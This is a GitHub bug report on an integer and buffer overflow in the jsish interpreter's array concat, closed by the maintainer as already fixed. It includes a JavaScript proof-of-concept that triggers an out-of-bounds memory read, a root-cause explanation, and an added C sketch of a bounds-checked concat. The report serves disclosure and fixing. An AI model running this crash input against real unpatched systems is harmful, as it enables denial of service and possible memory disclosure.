integer overflow and buffer overflow #9

Closed
bird8693 opened this issue Apr 13, 2020 · 1 comment
@bird8693
Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o.length = ~-4294967297;
var Shek = o.concat(o, o, o);
var ytbj = JSON.stringify('TrT{IlX88;Pc&6KbA$5dJn');
o = o.concat(o, o, o);
var Pcmm = o.reduce(function () {
}, o.length);
var Xtjk = o.concat(o, o, o);
Xtjk = o.concat(o, o, o);
Shek = Shek.forEach(function () {
}, o.length);
var HxDr = 759250124 == o.length;
var mscw = JSON.stringify(' ÌDDú\x05jr\xB3\x0F\x13R\x0FB7\xA9\xA3G\xA0\x16');
var KGeW = new WeakSet([
    [3.1589793],
    []
]);
var KhcQ = new Map([
    [],
    [
        o.length,
        o.length,
        -2147483648
    ]
]);
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e308);
var rbQB = o.forEach(function () {
}, o);
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;

vulnerability description:

The vulnerable code is in src/jsiValue.c at line 261, in the function jsi_ValueCopyMove; the affected code is as follows:
image
The address pointed to by from is illegal, that is, an illegal memory access.

Reason

In the process of parsing JS, when encountering the concat function of JS, jsish will call the parsing function jsi_ArrayConcatCmd
image

The curlen here is obtained by Jsi_ObjGetLength, as shown in the figure:

image
But curlen can be changed at will, and the for loop at src/jsiArray.c line 323 does not verify it, so it is easy to cross the boundary. In addition, the for loop calls the Jsi_ValueDup2 function, so the content beyond the boundary gets copied.
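The pattern the report describes, a script-settable length being used as a loop bound without being checked against the real allocation, is easiest to see in isolation. The following is an added example written for this page, not jsish code: ToyArray, toy_set_length, toy_checked_len and toy_concat are hypothetical names standing in for the object, the length assignment, and a hardened concat, and the sample values are constructed. It shows the one check the unchecked loop is missing: refuse to copy whenever the stored length is larger than what the storage can back.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical toy array (added example, not jsish's Jsi_Obj): the
 * script-visible length is stored separately from the allocation, so a
 * script can make the two disagree, as the "o.length = ..." line does. */
typedef struct {
    double *arr;   /* backing storage with room for cap elements */
    size_t  cap;   /* elements actually allocated */
    size_t  len;   /* script-visible length; never trusted as a bound */
} ToyArray;

static ToyArray *toy_alloc(size_t cap) {
    ToyArray *a = calloc(1, sizeof *a);
    if (!a) return NULL;
    a->arr = calloc(cap ? cap : 1, sizeof *a->arr);
    if (!a->arr) { free(a); return NULL; }
    a->cap = cap;
    return a;
}

static ToyArray *toy_new(const double *init, size_t n) {
    ToyArray *a = toy_alloc(n);
    if (a && n) { memcpy(a->arr, init, n * sizeof *a->arr); a->len = n; }
    return a;
}

static void toy_free(ToyArray *a) {
    if (a) { free(a->arr); free(a); }
}

/* Models "o.length = <value>": only the length field changes, storage does not. */
static void toy_set_length(ToyArray *a, size_t newlen) { a->len = newlen; }

/* The check the report says the concat loop lacks: a length about to be used
 * as a loop bound must be backed by the allocation. Refuses rather than
 * clamping, so the inconsistency stays visible to the caller. */
static int toy_checked_len(const ToyArray *a, size_t *out) {
    if (a->len > a->cap) return -1;
    *out = a->len;
    return 0;
}

/* Concatenates srcs[0..nsrc) into a fresh array. Returns NULL if any source
 * length is not backed by storage or the total would overflow size_t, so no
 * memcpy ever reads past a source's cap. */
static ToyArray *toy_concat(ToyArray *const *srcs, size_t nsrc) {
    size_t total = 0;
    for (size_t i = 0; i < nsrc; i++) {
        size_t n;
        if (toy_checked_len(srcs[i], &n) != 0) return NULL;
        if (n > SIZE_MAX - total) return NULL;   /* guard the running sum too */
        total += n;
    }
    ToyArray *out = toy_alloc(total);
    if (!out) return NULL;
    for (size_t i = 0; i < nsrc; i++) {
        size_t n = srcs[i]->len;                  /* validated in the first pass */
        memcpy(out->arr + out->len, srcs[i]->arr, n * sizeof *out->arr);
        out->len += n;
    }
    return out;
}

/* Consistent array: o.concat(o, o, o) on a two-element array yields 6 elements. */
static long demo_consistent(void) {
    double init[2] = {1, 2};                      /* constructed sample input */
    ToyArray *o = toy_new(init, 2);
    if (!o) return -1;
    ToyArray *srcs[3] = {o, o, o};
    ToyArray *r = toy_concat(srcs, 3);
    long result = (r && r->len == 6 && r->arr[5] == 2) ? (long)r->len : -1;
    toy_free(r);
    toy_free(o);
    return result;
}

/* Length set far beyond storage: concat must refuse instead of reading. */
static int demo_oversized_refused(void) {
    double init[2] = {1, 2};                      /* constructed sample input */
    ToyArray *o = toy_new(init, 2);
    if (!o) return 0;
    toy_set_length(o, (size_t)1000000);           /* storage still holds 2 */
    ToyArray *srcs[3] = {o, o, o};
    int refused = toy_concat(srcs, 3) == NULL;
    toy_free(o);
    return refused;
}

int main(void) {
    printf("consistent concat length: %ld\n", demo_consistent());
    printf("oversized length refused: %d\n", demo_oversized_refused());
    return 0;
}
```

The design choice worth noting is that toy_checked_len refuses rather than silently clamping len to cap: clamping would hide the corrupted state and let later operations such as reduce or forEach, which the PoC also calls with o.length, keep working from a value that no longer describes the object.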

@pcmacdon
Owner

Also a duplicate, or more accurately was fixed in issue #5.
